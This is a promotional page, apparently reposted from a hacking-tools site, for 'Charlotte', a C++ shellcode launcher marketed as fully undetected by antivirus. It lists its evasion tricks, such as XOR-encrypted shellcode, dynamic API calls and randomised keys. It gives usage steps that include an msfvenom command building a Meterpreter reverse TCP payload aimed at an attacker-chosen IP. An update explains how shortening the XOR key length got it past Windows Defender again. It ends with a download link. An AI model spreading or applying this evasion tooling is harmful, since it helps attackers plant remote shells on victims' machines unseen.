Charlotte – C++ Fully Undetected Shellcode Launcher

Click the icon to Follow me:- twitterTelegramRedditDiscord
charlotte 2 demo poc

c++ fully undetected shellcode launcher 😉

releasing this to celebrate the birth of my newborn



  1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
  2. dynamic invoking of win32 api functions
  3. XOR encryption of shellcode and function names
  4. randomised XOR keys and variables per run
  5. on Kali Linux, simply ‘apt-get install mingw-w64*’ and thats it!


  1. random strings length and XOR keys length

charlotte 1 0 detection charlotte


git clone the repository, generate your shellcode file with the naming beacon.bin, and run


  1. git clone && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
  4. python
  5. profit

tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload

charlotte 2 demo poc 1

update v1.1


apparently Microsoft Windows Defender was able to detect the .DLL binary,

and how did they flag it? by looking for several XOR keys of 16 byte size

changing it to 9 shown in the POC .gif below shows it is now undetected again


charlotte 3 demo poc2

Download Charlotte

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.


Original Source
Available for Amazon Prime